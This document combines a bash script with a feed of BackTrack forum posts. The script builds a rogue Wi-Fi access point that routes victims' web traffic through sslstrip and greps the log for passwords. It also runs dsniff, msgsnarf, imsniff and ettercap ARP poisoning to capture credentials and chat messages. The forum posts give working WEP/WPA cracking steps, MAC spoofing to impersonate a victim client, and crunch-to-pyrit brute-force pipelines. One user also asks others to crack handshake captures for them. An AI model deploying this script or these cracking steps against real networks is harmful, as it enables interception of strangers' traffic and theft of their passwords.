if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root" 1>&2
exit 1
fi
modprobe tun
sleep 1
echo "[>] Starting: Soft AP - Junke1990"
# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do
iflist[i]=$if
maclist[i]=$mac
((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')
for i in "${!iflist[@]}"; do
echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}
# select SoftAP adapter
for i in "${!iflist[@]}"; do
if [ $j != $i ]; then
echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
fi
done
echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}
# MAC address
intAP_MAC=${maclist[j]}
echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`
# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK
# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid
# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi
echo "[+] Setting up fake AP...";
sleep 1;
xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a $intAP_MAC $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3
echo "[+] Killing dhcpd and dnsmasq..."
# do this quiet for when the process isn't running
killall -q dhcpd3
killall -q dnsmasq
echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
option domain-name-servers 192.168.3.1;
option domain-name-servers 208.67.222.222;
option domain-name-servers 208.67.220.220;
range 192.168.3.10 192.168.3.254;
}
EOF
echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Setting up forwarding tables..."
# iptables
iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
# ip fwd enable
echo 1 > /proc/sys/net/ipv4/ip_forward
# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
# restart dnsmasq
echo "[+] Setting up dnsmasq..."
dnsmasq
### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
echo "[+] Setting up sslstrip..."
xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
xterm -e tail -f sslstrip.log &
xterm -e "tail -f sslstrip.log |grep 'pass' "&
sleep 1
else
echo "[-] SSLStrip not found..."
echo 'Edit $sslstrip to the correct path.'
fi
# DSniff
if [ $dsn == 1 ]; then
if which dsniff >/dev/null; then
echo "[+] Setting up dsniff..."
xterm -e dsniff -i at0 -m &
sleep 1
fi
else
echo "[-] DSniff not started..."
fi
# IMSniff - MSN only
if [ $ims == 1 ]; then
if which imsniff >/dev/null; then
if [ ! -d 'IMlog' ]; then
mkdir IMlog
fi
# gives a lot of unknown content err's
xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"&
sleep 1
fi
else
echo "[-] IMSniff not started..."
fi
# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then
if which msgsnarf >/dev/null; then
echo "[+] Setting up msgsnarf..."
xterm -e msgsnarf -i at0 &
sleep 1
fi
else
echo "[-] MSGSnarf not started..."
fi
# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
sleep 1
echo "[+] Setting up ettercap..."
xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &
sleep 1
# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
echo "Can't enable ip_forward"
fi
echo "[x] All done! have fun!"
-
-
15:05
»
remote-exploit & backtrack
Hi,
I have a general question about making a Soft AP/Fake AP. If a client A is connected with an AP B, and the connection between them is using WPA2 (preshared key). Is it possible for me to act as AP B (with the mac and SSID belonging to AP B) and downgrade the connection in somehow?
With downgrade I mean making the connection use no encryption at all or using a weaker form of encryption.
Let's assume that I can use airdrop-ng to eliminate AP B.
?
/ Alex
-
14:13
»
remote-exploit & backtrack
I dont know too much about it, so i need a hint of some of the wireless guys..
My Adapter, alfa 500 mw is damaged.. its tx power is incredibly low now, kind of just 1 meter range conectivity..
i think it could be because i tried to use it once, without an antenna :eek:
yeah, now you could be wondering why.. just curiosity..
Could that be the reason it is damaged? what happen if i use my alfa 500 mw without an antenna attached to it?
Another clue, i had used it with a 16 dbi omni-directional antenna.. and my adapter was getting hot. I am not sure what have damaged the adapter.
I want to know, because i will buy another one, and dont want to commit the same error again.
-
13:11
»
remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets(#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collects IVs faster?!(now, it takes days[or weeks!] to collect enough packets!)
Thanks!
-
-
15:09
»
remote-exploit & backtrack
I am looking at doing some wep key cracking on my own system because I do small networking jobs and have a lot of people ask me about the wep crack difficulty and security. I am mostly just looking to broaden my horizon a little. I have read it is really not that difficult and I have watched people do it via youtube and I have scanned this forum and the other backtrack forums. I have the steps down pretty good but I am unable to get it to work correctly and I do beleive I know the problem but not sure...
When I run a aireplay -ng --test I get a "packet Injection is working" and it will give me a percent, i am usually getting around a 50%. I am using a IBM t61 lenovo ( I cant remeber but i think it is a 4965?) thinking maybe possibly a driver problem??
Should I be getting a 100% on the test.. I usually install Netgear routers but I have installed a couple Linksys's also..
Thanks for you help in advance I hope that this an informative and fun place to be.. My luck on the other backtrack forum was not so fun..
nathan
-
15:05
»
remote-exploit & backtrack
so that my computer as for my mac address does not appear on the routers DHCP table or any other data logs.
Thanks in advance.
-
13:04
»
remote-exploit & backtrack
hi guys,
am tired to know how can combatible d-link to work with backtrack3
and where i could find the ethros to used it .
thank you for ur help
-
6:22
»
remote-exploit & backtrack
Salve a tutti la discussione che sto aprendo e' solo a livello di curiosita.
Vorrei sapere se mai qualcuno e' riuscito a cracckare la wpa di alice(24 caratteri) o quella di fastweb(10 caratteri).Io mi sono arreso,almeno riguardo la wpa di alice,perche' penso che sia impossibile indovinarla con un dizionario casuale o un brute force con crunch.forse la strada migliore e' quella della retroingegnerizzazione.....arte alquanto difficile da intraprendere.Ci sarebbe solo un tizio di nome saxdax che e' riuscito,a detta di altri, a risalire tramite l' ssid della rete alla wpa standard del router di alice.Riguardo a quella di fastweb l'impresa con l'aiuto di pyrit potrebbe essere fattibile.
Voi cosa ne pensate?
-
5:51
»
remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)
-
4:00
»
remote-exploit & backtrack
hi!
i've using backtrack 4 on VMware. When I use the self-installed wlassistant i can see the wifi networks on my neighbourhoods, but if I've using in the kernel the airodump, than i can NOT see any usefull networks detalis, i see nothing.
Please help me, what may be the problem. Thanks guys.
-
-
13:31
»
remote-exploit & backtrack
i know theres adapters and accessories that can reach well over a mile with the correct setup, but I'm looking for a good fast one that will reach at least 500 feet. hopefully under 150 dollars too.
i don't want any signal boosters either just an the adapter. plus one that would be bt4 compatible of course.
-
-
22:35
»
remote-exploit & backtrack
Does anybody know what chipset a microsoft brand wireless notebook adapter MN-520 has? i read that it should work with backtrack but idk for sure and i need to know if i should just buy a better one?
-
-
19:30
»
remote-exploit & backtrack
so i have the PCMCIA proxim orinoco gold 8470_fc , this card works out of the box in BT3 monitor , injection no problem
in BT4 i have issues after i finally get it recognized and put in monitor mode (take a little trick as well) i went to launch aireplay and after few seconds my system frooze . does this card need a patch on BT4 .?
-
-
17:21
»
remote-exploit & backtrack
ok so i have been getting this error in gerix
Error opening /root/.gerix-wifi-cracker/*.xor "packetforge-ng --help" for help. [Failure]
i replaced the 'o' with '0' in gerix.py where its says packetforge since 0 is the arp option , again i got the same error .
the error says / root/ gerix , i looked at the code and i could not find anything related to this error except the configuration directory mentioned in the begining of the code , is this could be the problem , should i point it to where gerix directory at?
-
-
0:57
»
remote-exploit & backtrack
Hey guys, I was wondering if someone could tell me if Nessus is really required to run the tools in Backtrack. Aircrack tools specifically...thanks!
-
13:05
»
remote-exploit & backtrack
Hi All... before.. i'm sorry if this thread is not in place.. :)
This my first thread..
Hi.. I would ask.. How to mapping wireless using modem sierra 881U with GPS ?
Thanks...
Yours
Semiotics Code
-
-
5:56
»
remote-exploit & backtrack
Dear All
i have a N150 netgear router and i am trying to break the wep code on it.
i have logged into it to apply the following settings:
enc:wep 64bit
key:1B9DDA483D
i have tried the usual packet injection method using aireplay to break into my bt business hub with no issue however when i do the same for the netgear the number of data packets captured does not go above 255!
i do not know why this is!
any ideas
cheers
-
1:28
»
remote-exploit & backtrack
hi,
I have got wpa handshake but unable to get key...i m submitting 3 *.cap files which contains IVs.Plz get me wpa key for each cap file...
I have attached files in : hxxp://uploading.com/files/cacfc23c/cap.rar/
thx
-
-
1:24
»
remote-exploit & backtrack
Hey I'm not doing any hacking right now, just trying to set up a network.
I have a computer running Linux, and it has two wifi cards:
1)
wlan0 = RTL8187L (This is an Alfa 500mw)
2)
wlan1 = rt73 (This is just a shitty little TP-Link USB stick)
So I've got an extension lead for the Alfa and it's mounted on top of my house. The Alfa is used to connect to a network which is about 100 metres away, and this network provides an Internet connection.
What I want to do is broadcast an AP from my other wifi card (the rt73), so that computers in my house can connect to it. I will set up routing between
wlan1 and
wlan0 so that computers in my house can access the internet.
Setting up
wlan1 and setting up the routing will be a piece of cake:
Code:
ifconfig wlan1 10.10.10.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wlan0 -s 10.10.10.0/24 -j MASQUERADE
Also I will set up DHCP on
wlan1 so that all my computers at home can get connected to the access point with ease.
Now, here's the question:
What program should I use for managing the access point which will be broadcast from wlan1?
I've heard of
hostapd,
airbase-ng and
mdk3.
I want to have a full range of options for the AP I broadcast from wlan1, e.g. whether it's not encrypted, or WEP, or WPA.
Which program would you recommend? Which is most reliable and does its job the best for what I'm looking for?
-
0:35
»
remote-exploit & backtrack
I was wondering if anyone on here has been successful in overclocking this particular graphics card. I added the "coolbit" option and I even see the overclock options in the Nvidia X Server Settings, but when I try to change any of the values, it changes right back to default values. Really weird. If anyone has been successful, would you please share what you did and also what values you used? Thanks!
-
-
3:15
»
remote-exploit & backtrack
I finally got CUDA working ok and I did a benchmark which shows that CUDA is slower than my CPU! I don't understand. Am I doing something wrong? My graphics card is an Nvidia GeForce 8600M GS. Here are my results:
root@bt:~# pyrit benchmark
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg
This code is distributed under the GNU General Public License v3+
Running benchmark (1363.2 PMKs/s)... /
Computed 1403.20 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 8600M GS'': 630.5 PMKs/s (RTT 3.1)
#2: 'CPU-Core (SSE2)': 678.5 PMKs/s (RTT 2.8)
-
0:23
»
remote-exploit & backtrack
I was run karma.rc script and I have two problem.
1. Karma.rc console write:
"Exploit failed, could not obtain a database connection within 5 second. The max pool size is currently 30; consider increasing it."
and
" ActiveRecord:ConnectionTimeoutError, could not obtain a database..."
2. When DHCP server run write:
"Can't create PID file /var/run/dhcpd.pid: Permission denied."
Could Anybody help me?
-
-
22:08
»
remote-exploit & backtrack
Hey guys, anyone use Crunch anymore? Or is it something outdated? All the commands I find don't work anymore. What I'm trying to do is essentially passthrough with crunch (exactly what is on page 17 in Pureh@te's CUDA guide) The command is:
/pentest/passwords/crunch/crunch 8 8 123456 | pyrit -e "ESSID" -f - passthrough | cowpatty -d - -r wpa-01.cap -s "ESSID"
I've tried many variations of this and can't get it to work. Please help me, thanks!
-
4:17
»
remote-exploit & backtrack
Hey guys, I'm reading the CUDA guide trying to passthrough with Crunch. I've tried so many different possiblities and nothing is working. Any ideas? This is the last thing that I've tried:
/pentest/passwords/crunch/crunch 10 10 0123456789 | pyrit -e Riley -o - passthrough | /pentest/wireless/cowpatty/cowpatty -d - -r outfile.cap -s Riley
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
Using STDIN for hashfile contents.
WARNING: Version mismatch between <module 'cpyrit._cpyrit_cpu' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cpu.so'> ('0.3.0') and <module 'cpyrit._cpyrit_cuda' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cuda.so'> ('0.3.1-dev (svn r228)')
The command 'passthrough' requires the option '-i'. See 'help'.
fread: Success
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it didn't work out.
0 passphrases tested in 0.27 seconds: 0.00 passphrases/second
-
1:32
»
remote-exploit & backtrack
I cannot figure out how to fix this. Tried googling and no help. This may not even be something to be worried about, idk. When I run: pyrit selftest, it says everything is running ok. I just don't like warnings ;) This is the warning that I am getting:
root@bt:~# pyrit benchmark
WARNING: Version mismatch between <module 'cpyrit._cpyrit_cpu' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cpu.so'> ('0.3.0') and <module 'cpyrit._cpyrit_cuda' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cuda.so'> ('0.3.1-dev (svn r228)')
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg
Project Hosting on Google Code
This code is distributed under the GNU General Public License v3+
Running benchmark (1382.6 PMKs/s)... |
Computed 1373.47 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 8600M GS'': 632.1 PMKs/s (RTT 2.9)
#2: 'CPU-Core (SSE2)': 671.4 PMKs/s (RTT 3.0)
-
-
14:20
»
remote-exploit & backtrack
Hi all, BT4 Final is great! But creating a
fake AP in
master mode on my
atheros ar5007 doesn't seem to work. I like master mode for its great
AP speeds. I can't get a softAP over 5kB/s, no matter what MTU I try.
I'm using nick_the_greek's great wlan_nick script, as an aid in creating them. master mode in bt4pf was like I had a 50+kB/s normal AP, low latency and everything.
ath5k drivers don't support master mode. Now I tried the latest
madwifi-ng drivers. I can make an ath0 VAP in master mode, but when I try starting airbase, it fails:
Code:
madwifi-ng drivers:
root@bt:~# wlanconfig ath0 destroy
root@bt:~# ip link set dev wifi0 down
root@bt:~# wlanconfig ath0 create wlandev wifi0 wlanmode master
root@bt:~# iwconfig | grep "Mode:"
ath0 Mode:Master
root@bt:~# airbase-ng ath0
ioctl(SIOCSIWMODE) failed: Invalid argument
root@bt:~# airbase-ng wifi0 (works fine)
Code:
ath5k drivers:
root@bt:~# ifconfig wlan0 down
root@bt:~# iwconfig wlan0 mode master
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Invalid argument
root@bt:~# iwconfig wlan0 mode managed (works fine)
So for some reason with BT4F, I can only create a softap on wlan0, mon0 or wifi0, but
can't create a master mode AP. Am I overlooking somthing?
With BT4 PF and beta it seemed to work fine tho...
Ideas anyone?..
-
-
10:14
»
remote-exploit & backtrack
You become when I have a key and do not enter how certain with backtrack 4?
-
-
4:00
»
darkc0de
Wireless Moon 3.0,aircrack and net stumbler
-
-
13:05
»
remote-exploit & backtrack
anyone know or own a wireless card for laptop that work in backtrack including injection.
any suggestions will be appreciated , thank you
-
-
13:07
»
remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
-
-
5:27
»
remote-exploit & backtrack
in airodump-ng data packet is 1200000 And in aircrack-ng to me you show 508 ivs whay
-
-
15:48
»
remote-exploit & backtrack
hi,
i cant remember a tool i used on backtrack or where to find it. it was a wodlst creator.
for example i have a wpa handshake i know my wpa is 8 lettes long and in capital letters. there was a tool on backtrack where i could point this tool to the handshake file and it would start going though all the letter e.g
AAAAAAAB
AAAAAAAC
AAAAAAAD
and so on but i just cant remember where this tool is on backtrack
hope you can help
-
10:10
»
remote-exploit & backtrack
greets all,
so I'm in the market for an (c)antenna upgrade = I am looking to purchase a new wifi antenna. I have multiple wifi cards, all with the ability to connect an external antenna via male RP-SMA connector, only 3 of the cards are really worth a darn tho. specifically 2x USB alfa cards (AWUS036nh - 2000mW, AWUS050NH - 500mW) and a dlink (DWL-G520 revB PCI). for an external antenna I am using the "
super cantenna" from wireless garden inc. with a cheap retractable tripod (from walmart for $13) and up-until-now, my antenna setup has been rock solid, and great performer
for me. the specs for it are as follows :
Code:
Super Cantenna
Model SCB10X:
Electrical Specifications
Frequency: 2400-2500 MHz
Gain: 12 dbi
Beam Width: Approx. 30 degrees
Impedance: 50 Ohm
Max input: 50 Watts
VSWR: <1.5:1 avg.
Mechanical Specifications
Length: 12”
Material Base: Metal
Lid: Plastic
Connector: Integrated 36-inch RPSMA cable, RPTNC adapter
Polarization: Linear
I figure I might as well go for a "bigger and better" antenna :D I've got $100 to sink into my purchase. my use case is as follows: I have a local coffee shop that lets me siphon internet, for being a loyal customer (well, actually the g/f is, I dont drink coffee), and for helping out with tech support issues every now and then. I live about 5-6 blocks from them, and get a decent signal now, but
I just know I can get better... I think I just need to upgrade the antenna I have.
so I figured I'd come to
ol' faithful = the remote-exploit forums, to see if one of u can make a suggestion for what to buy, and/or give your oppinion of your current setup?! I have looked long and wantonly at
onryo's thread =
ultra long range antennas - howto , but have come to the conclusion that it is just too much work, and requires too steady of a hand + patience to get it built (not to mention working properly) ... so I've decided that is out of the question... really any DIY project is out of question. I'd rather just buy one. boy, I do truly wish someone would manufacture that
pwnbone of his, as I'd love to snatch something like that up in an instant!
I've checked into
freenet antennas (which is outside of the US),
gold wireless antennas,
l-com - specifically
this,
this page talks about many different antenna's, etc. what about
this one I keep seeing ALL over ebay?
only recently I decided to take a look at ebay, and WOW - there are
sooo many antenna's its hard to separate the crap from the good when I just don't have much knowledge in the antenna selection department. for example, this one sounds very nice = "
2.4GHz 16DBi Wifi Yagi Antenna RP-SMA and Moutning kit". some are USB based? whatever I get, I want to make sure that the parts of high-quality, will last long (even in exposure to the outdoor elements of the pacific NW = lots of rain), has minimal signal degradation, and hopefully has the approval of other remote-exploit forum-goers.
honestly, I'd like to hear what other remote-exploit forum-goers have in their setup, and if possible I'd like to be able to purchase something similar, as long as it's an upgrade from what I currently have with the potential of increasing my signal to my connection which is ~5-6 blocks away. ideally I'd love to get something along the lines of
onryo's
pwnbone
!
quoting from the text underneath his image of the pwn bone on his
site::
Quote:
|
This is the "pwn bone" A 26dBi yagi. The PwnBone is 3 PCB Teflon stripline 20 dBi yagi antennas stacked at about 1/20th lambda and phased a little. I rescaled it for 2442 MHz from an existing classified design. No it is not curved. The wide angle lens sucks. Length is 1.6 meters. From 5.1 km line of sight I have a -52 dbi signal. Using a 2 watt amp to fry away any problems I may encounter. Have had up to 332 APs seen at once while pointed in one direction. Nice addition to my rouge AP.
|
(onryo, hope u don't mind me linking to yr pic/site - if u desire I will take this part out ... I'm just sooo envious! )
so what'cha think? someone wanna offer me a suggestion, or point out a site for me to pick up something, nice n easy? purrty-please? :D
-
-
22:02
»
remote-exploit & backtrack
I have a really good Broadcom based PCMCIA card that works great in Debian (after fwcutter, older kernel) but there is a slight issue in BT4.
The card works in BT4 right after the fresh install but it sees only a half or less of APs that the Intel based card inside the laptop can see. This is odd because normally in Debian or Windows this Broadcom card can detect many more APs than any other card I've ever seen.
I know this is vague but I am looking for any ideas on how to fix this.
-
16:57
»
remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
-
10:57
»
remote-exploit & backtrack
hi all
i have a little question!
we've setup a AP with wep shared key and i consumed that a hacker may have my wep !!
so we decided to limit the MAC address of the wireless cards !
is there any way that someone can fake this MACs or bypass this limitation anyway?
i read that if this limitation presents! with a tcpdump command it is possible to notice
this by getting deauth result, so i want to know can this limitation protect my AP?!
-
-
13:53
»
remote-exploit & backtrack
Is this possible, I mean to try capture IVs and have a connection to a other modem altogether..?
-
9:29
»
remote-exploit & backtrack
i am beginner ... i am trying to crack wep key of a wi fi network ....its my home network and its key is a mobile no .... i did everything and got the pcap file of handshaking signal using airoplay-ng
its a .cap file ....now how to get the wep key from it since dictionaty attack wont work .....so tell me a brute force method to get it
-
4:32
»
remote-exploit & backtrack
Hola.
En primer lugar comentar que me estoy introduciento en este tema, así que pido disculpas si pregunto alguna "evidencia".
Utilizo BackTrack4.
Intento identificarme y conectarme con el router:
ifconfig -a
ifvonfig wlan0 up
ifconfig
iwlist wlan0 scanning
iwconfig wlan essid A1A channel 8
hasta ahí todo bien, el tema es que no me asocia el access poin:
wlan0 IEEE 802.11bg ESSID:"A320ATV"
Mode:Managed Frequency:2.447 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
